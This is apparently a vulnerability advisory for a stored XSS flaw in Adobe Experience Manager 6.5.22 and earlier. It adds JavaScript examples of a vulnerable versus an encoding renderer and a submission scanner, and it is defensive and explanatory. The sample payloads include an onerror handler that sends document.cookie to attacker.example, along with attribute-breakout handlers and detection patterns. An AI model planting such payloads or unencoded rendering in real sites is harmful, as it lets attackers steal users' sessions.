CVE-2025-46859 in Experience Manager

Summary

by MITRE • 06/11/2025

Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.


Analysis

by VulDB Data Team • 06/11/2025

Adobe Experience Manager versions 6.5.22 and earlier contain a stored cross-site scripting vulnerability (CWE-79). It is the stored variant of XSS: the malicious input is persisted on the server and served to every user who later loads the affected content, rather than being reflected back only to the user who submitted it. A low-privileged attacker supplies a JavaScript payload through a form field that AEM accepts and stores; when the stored value is written into a page without adequate output encoding, the payload runs in the browser of any user who views that page, with that user's session and privileges. The root cause is insufficient validation of the submitted value combined with missing context-aware output encoding at the point where the stored value is rendered into HTML, and the second of these is the control that would have prevented execution regardless of what was accepted on input.
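The sink class described above, as an added example that is not Adobe's, AEM's or VulDB's code: stored form-field values rendered by a concatenating template (the vulnerable path) next to the same page rendered with output encoding (the hardened path). The field names, the payloads and the attacker.example host are constructed for the example, and the event-handler counter at the end exists only to contrast the two renderers.

```javascript
// Added example (not Adobe's or AEM's code): a minimal model of the sink class
// behind a stored XSS of this kind. Form-field values saved by one user are
// later rendered into a page that another user opens. All names, payloads and
// hosts below are constructed for illustration.

const storedFields = [
  { name: 'author', value: 'Alice' },
  // text-context payload: an element carrying an event handler
  { name: 'comment', value: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
  // attribute-context payload: closes the value="" attribute and adds a handler
  { name: 'subject', value: '" autofocus onfocus="alert(document.domain)' },
];

// Vulnerable renderer: concatenates the stored value into HTML with no encoding.
// The value lands in two contexts, a double-quoted attribute and element text.
function renderUnsafe(field) {
  return `<input name="${field.name}" value="${field.value}">` +
         `<p>${field.value}</p>`;
}

// Hardened renderer: entity-encode on output. Every character that can change
// the meaning of HTML text or a double-quoted attribute is replaced, so the
// browser displays the payload as literal text instead of executing it.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, ch => map[ch]);
}

function renderSafe(field) {
  return `<input name="${encodeForHtml(field.name)}" value="${encodeForHtml(field.value)}">` +
         `<p>${encodeForHtml(field.value)}</p>`;
}

// Render every stored field with the given renderer, one fragment per line.
function renderPage(renderer, fields = storedFields) {
  return fields.map(f => renderer(f)).join('\n');
}

// Rough indicator used only to contrast the two renderers: counts attribute-style
// event handlers (on...=") that reached the markup unencoded. Not an XSS detector.
function countEventHandlers(html) {
  return (html.match(/\son[a-z]+\s*=\s*["']/gi) || []).length;
}

console.log('--- vulnerable render ---');
console.log(renderPage(renderUnsafe));
console.log('--- encoded render ---');
console.log(renderPage(renderSafe));
```

Loaded in a browser, the vulnerable output executes the img handler and, through the broken-out value attribute, the autofocus handler; the encoded output shows both payloads as text. In AEM terms, HTL's default context-aware escaping is the encodeForHtml step, while writing a property into markup with @ context='unsafe', or in Java/JSP without the XSSAPI encoders, is the renderUnsafe path.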

The impact goes beyond executing a script. Because the payload runs in the victim's origin and session, it can read whatever the victim can read, submit requests the victim is allowed to make, exfiltrate session material that is not protected by the HttpOnly flag, present a fake login prompt to harvest credentials, or redirect the victim to an attacker-controlled site. The practical privilege-escalation path is that a low-privileged contributor stores the payload where higher-privileged users (content authors, reviewers, administrators) will view it; the script then acts with those users' rights inside AEM. Deployments that use AEM for collaborative authoring, where form fields are routinely filled in by one group and reviewed by another, are the most exposed. The low privilege requirement means any account able to submit the affected form is a viable starting point, which is why this should be treated as a priority rather than a cosmetic web flaw.

From an ATT&CK perspective the payload itself is T1059.007 (Command and Scripting Interpreter: JavaScript), and the typical follow-on is T1539 (Steal Web Session Cookie) or direct abuse of the victim's rights from inside the hijacked session. T1566.001 (Phishing: Spearphishing Attachment) is not a good fit: no attachment is involved, and no lure is needed at all when the poisoned page is one that target users open as part of their normal work. Remediation should start with updating affected AEM 6.5 installations to a fixed release. In custom components, encode every stored value for the context it is written into (HTML body, attribute, URL or JavaScript) rather than relying on input filtering alone; in AEM that means keeping HTL's context-aware escaping on instead of using @ context='unsafe', and using the XSSAPI encoders in JSP or Java code. A Content Security Policy that disallows inline scripts limits what an injected payload can do even where encoding is missed. Until the update is applied: monitor form-field submissions for markup, event-handler attributes and javascript: URIs, review already-stored form content for such payloads, restrict which accounts may submit the affected forms, and keep a web application firewall in front of the author and publish tiers as a secondary layer. Security awareness training helps only with the lure-based variant; the stored variant requires no user mistake beyond opening the page.
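The submission monitoring suggested above, as an added example that is not VulDB's or Adobe's tooling: a scanner over form-submission records that decodes URL and entity encoding before matching, so a payload sent as %3Cscript%3E is not missed, and that does not flag a benign comparison such as "a < b". The JSON-lines record format, the field names, the users and the values are all constructed assumptions for this example; real AEM request logs would need their own parser in front of classify().

```javascript
// Added example, not VulDB's or Adobe's code. Scans form-submission records for
// script-like field values. The record format (JSON lines with ts/user/path/
// field/value) and every sample entry below are assumptions for this example.

const sampleSubmissions = [ // constructed sample records
  '{"ts":"2025-06-11T10:00:01Z","user":"author1","path":"/content/forms/feedback","field":"comment","value":"Great article"}',
  '{"ts":"2025-06-11T10:02:17Z","user":"contrib2","path":"/content/forms/feedback","field":"name","value":"<svg onload=alert(document.domain)>"}',
  '{"ts":"2025-06-11T10:02:18Z","user":"contrib2","path":"/content/forms/feedback","field":"website","value":"javascript:alert(1)"}',
  '{"ts":"2025-06-11T10:02:19Z","user":"contrib2","path":"/content/forms/feedback","field":"comment","value":"%3Cscript%3Efetch(%27//attacker.example%27)%3C/script%3E"}',
  '{"ts":"2025-06-11T10:05:40Z","user":"author3","path":"/content/forms/feedback","field":"comment","value":"a < b && b > c"}',
];

// Code point helper that ignores out-of-range numeric references instead of throwing.
const fromCode = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// Undo up to two layers of URL encoding and the common HTML entities, so that a
// payload submitted in encoded form is matched in its decoded form.
function normalize(value) {
  let v = String(value);
  for (let i = 0; i < 2; i++) {
    let d;
    try { d = decodeURIComponent(v); } catch { break; } // malformed %-sequence: stop decoding
    if (d === v) break;
    v = d;
  }
  return v
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"').replace(/&apos;/gi, "'")
    .replace(/&amp;/gi, '&');
}

// Heuristic indicators; each is a sign that the value carries active content
// rather than plain text. The tag rule requires a tag name directly after "<"
// so that a bare "<" or ">" in prose does not trip it.
const INDICATORS = [
  { name: 'html-tag',       re: /<\/?[a-z][\w-]*(\s[^>]*)?>/i },
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'script-element', re: /<script\b/i },
];

// Return the names of every indicator that matches the decoded value.
function classify(value) {
  const v = normalize(value);
  return INDICATORS.filter(ind => ind.re.test(v)).map(ind => ind.name);
}

// Parse each record and return those whose value trips at least one indicator.
function scanSubmissions(lines) {
  const hits = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed records
    const indicators = classify(rec.value);
    if (indicators.length > 0) {
      hits.push({ ts: rec.ts, user: rec.user, field: rec.field, indicators });
    }
  }
  return hits;
}

for (const hit of scanSubmissions(sampleSubmissions)) console.log(hit);
```

Run under Node, the scanner prints the three contrib2 records and nothing for the two benign comments. The indicators are heuristics and expect human review of hits: a comment containing the text "one=" trips the event-handler rule, and an attacker can still use encodings the normalizer does not undo, which is why this monitoring is a stopgap and output encoding plus the vendor fix is the actual remedy.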

Responsible

Adobe

Reservation

04/30/2025

Disclosure

06/11/2025

Moderation

accepted

CPE

ready

EPSS

0.00259

KEV

no

Activities

very low
